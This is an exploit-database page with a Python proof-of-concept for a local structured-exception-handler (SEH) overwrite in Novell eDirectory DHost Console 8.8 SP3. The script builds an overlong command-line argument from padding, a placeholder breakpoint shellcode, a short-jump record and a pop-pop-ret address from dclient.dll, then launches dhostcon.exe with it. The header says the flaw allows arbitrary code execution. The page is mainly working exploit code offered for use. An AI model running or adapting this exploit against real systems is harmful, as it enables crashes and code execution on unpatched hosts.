[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Novel eDirectory DHost Console 8.8 SP3 Local SEH Overwrite

Author
d0lc3
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14504
Category
dos / poc
Date add
18-10-2010
Platform
windows
==========================================================
Novel eDirectory DHost Console 8.8 SP3 Local SEH Overwrite
==========================================================

# Exploit Title:    Novel eDirectory DHost Console 8.8 SP3 Local SEH Overwrite
# Date:         17/10/2010
# Author:       d0lc3    (@rmallof - http://elotrolad0.blogspot.com/)
# Software Link:    http://www.novell.com/
# Version:      8.8 SP3 (20216.67)]
# Tested on:        win32 xp sp3 (spa)
 
#Summary:
#   DHostCon.exe is prone to local denial of service caused by stack overflow
#   triggered if user-supplied parameters are too long (1074 bytes).
#   Due nature of this vulnerabilty, attackers could exploit this issue
#   to execute arbitrary code on local host.
 
#PoC:
 
#!/usr/bin/python
import os,struct
 
def main():
    path="C:\Novell\NDS\dhostcon.exe"  
    args="x.x.x.x"              #ip server
    buf="A"*1065
    nseh=struct.pack("<L",0x90909eeb)    #jmp short 0012ff50 +NOP + NOP
    seh=struct.pack("<L",0x61012c20) #PPR dclient.dll
     
    shellcode=struct.pack("<B",0xCC) #INT3
 
    crash=buf+shellcode+nseh+seh
 
    os.system(path+" "+args+" "+crash)  #Crash!
 
if __name__=="__main__":
    main()



#  0day.today [2024-12-24]  #